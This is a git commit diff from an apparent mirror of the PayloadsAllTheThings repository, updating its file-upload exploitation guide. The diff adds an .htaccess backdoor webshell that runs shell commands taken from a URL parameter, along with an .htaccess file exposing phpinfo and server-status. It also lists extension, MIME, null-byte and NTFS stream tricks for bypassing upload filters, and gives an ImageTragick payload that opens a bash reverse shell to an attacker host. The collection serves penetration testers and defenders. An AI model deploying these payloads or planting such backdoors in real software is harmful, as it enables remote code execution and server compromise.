mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Upload Methodology
This commit is contained in:
parent
0a01854a6a
commit
21f2b5dca6
@ -1,6 +1,6 @@
|
||||
# CONTRIBUTING
|
||||
|
||||
PayloadAllTheThings's Team :heart: pull requests :)
|
||||
PayloadsAllTheThings' Team :heart: pull requests :)
|
||||
Feel free to improve with your payloads and techniques !
|
||||
|
||||
You can also contribute with a :beers: IRL, or using the sponsor button.
|
||||
|
@ -0,0 +1,5 @@
|
||||
AddType application/x-httpd-php .htaccess
|
||||
# <?php phpinfo(); ?>
|
||||
SetHandler server-status
|
||||
SetHandler server-info
|
||||
|
@ -0,0 +1,23 @@
|
||||
# htaccess backdoor shell
|
||||
# this is relatively stealthy compared to a typical webshell
|
||||
|
||||
# overriding deny rule
|
||||
# making htaccess accessible from the internet
|
||||
# without this you'll get a HTTP 403
|
||||
<Files ~ "^\.ht">
|
||||
Require all granted
|
||||
Order allow,deny
|
||||
Allow from all
|
||||
</Files>
|
||||
|
||||
# Make the server treat .htaccess file as .php file
|
||||
AddType application/x-httpd-php .htaccess
|
||||
|
||||
# <?php system($_GET['cmd']); ?>
|
||||
|
||||
# To execute commands you would navigate to:
|
||||
# http://vulnerable.com/.htaccess?cmd=YourCommand
|
||||
|
||||
# If system(); isnt working then try other syscalls
|
||||
# e.g. passthru(); shell_exec(); etc
|
||||
# If you still cant execute syscalls, try bypassing php.ini via htaccess
|
@ -12,48 +12,58 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at
|
||||
* [Picture upload with LFI](#picture-upload-with-lfi)
|
||||
* [Configuration Files](#configuration-files)
|
||||
* [CVE - Image Tragik](#cve---image-tragik)
|
||||
* [ZIP Archive](#zip-archive)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Tools
|
||||
- [Fuxploider](https://github.com/almandin/fuxploider)
|
||||
- [Burp> Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa)
|
||||
|
||||
## Exploits
|
||||
|
||||
### PHP Extension
|
||||
|
||||
```powershell
|
||||
.php
|
||||
.php3
|
||||
.php4
|
||||
.php5
|
||||
.php7
|
||||
|
||||
Less known extensions
|
||||
.pht
|
||||
.phar
|
||||
.phpt
|
||||
.pgif
|
||||
.phtml
|
||||
.phtm
|
||||
|
||||
Double extensions
|
||||
.jpeg.php
|
||||
.jpg.php
|
||||
.png.php
|
||||
```
|
||||
* Default PHP extensions
|
||||
```powershell
|
||||
.php
|
||||
.php3
|
||||
.php4
|
||||
.php5
|
||||
.php7
|
||||
```
|
||||
* Less known extensions
|
||||
```powershell
|
||||
.pht
|
||||
.phps
|
||||
.phar
|
||||
.phpt
|
||||
.pgif
|
||||
.phtml
|
||||
.phtm
|
||||
.inc
|
||||
```
|
||||
* Double extensions
|
||||
```powershell
|
||||
.jpeg.php
|
||||
.jpg.php
|
||||
.png.php
|
||||
.*.php
|
||||
```
|
||||
|
||||
### Other extensions
|
||||
|
||||
```powershell
|
||||
asp : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)
|
||||
perl: .pl, .pm, .cgi, .lib
|
||||
jsp : .jsp, .jspx, .jsw, .jsv, .jspf
|
||||
Coldfusion: .cfm, .cfml, .cfc, .dbm
|
||||
```
|
||||
* asp : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)`
|
||||
* perl: `.pl, .pm, .cgi, .lib`
|
||||
* jsp : `.jsp, .jspx, .jsw, .jsv, .jspf`
|
||||
* Coldfusion: `.cfm, .cfml, .cfc, .dbm`
|
||||
|
||||
### Upload tricks
|
||||
|
||||
- Use double extensions : `.jpg.php`
|
||||
- Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg`
|
||||
- Mix uppercase and lowercase : `.pHp, .pHP5, .PhAr`
|
||||
|
||||
- Null byte (works well against `pathinfo()`)
|
||||
* .php%00.gif
|
||||
* .php\x00.gif
|
||||
@ -61,13 +71,16 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm
|
||||
* .php\x00.png
|
||||
* .php%00.jpg
|
||||
* .php\x00.jpg
|
||||
- Special characters
|
||||
* file.php...... (In Windows when a file is created with dots at the end those will be removed)
|
||||
* file.php%20
|
||||
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
||||
* `Content-Type : image/gif`
|
||||
* `Content-Type : image/png`
|
||||
* `Content-Type : image/jpeg`
|
||||
- [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures)
|
||||
|
||||
Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
|
||||
* Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
|
||||
- Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "file.asax:.jpg"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "file.asp::$data.")
|
||||
|
||||
### Picture upload with LFI
|
||||
|
||||
@ -78,6 +91,10 @@ Valid pictures hosting PHP code. Upload the picture and use a local file inclusi
|
||||
|
||||
### Configuration Files
|
||||
|
||||
If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code.
|
||||
If you are trying to upload files to an ASP server, take a look at the .config trick to execute code.
|
||||
|
||||
Configuration files examples
|
||||
- .htaccess
|
||||
- web.config
|
||||
- httpd.conf
|
||||
@ -86,12 +103,23 @@ Valid pictures hosting PHP code. Upload the picture and use a local file inclusi
|
||||
|
||||
### CVE - Image Tragik
|
||||
|
||||
Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
|
||||
|
||||
```powershell
|
||||
HTTP Request
|
||||
Reverse Shell
|
||||
Touch command
|
||||
push graphic-context
|
||||
viewbox 0 0 640 480
|
||||
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
|
||||
pop graphic-context
|
||||
```
|
||||
|
||||
More payload in the folder `Picture Image Magik`
|
||||
|
||||
### ZIP archive
|
||||
|
||||
When a ZIP/archive file is automatically decompressed after the upload
|
||||
|
||||
* Zip Slip: directory traversal to write a file somewhere else
|
||||
|
||||
## References
|
||||
|
||||
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
|
||||
|
Loading…
Reference in New Issue
Block a user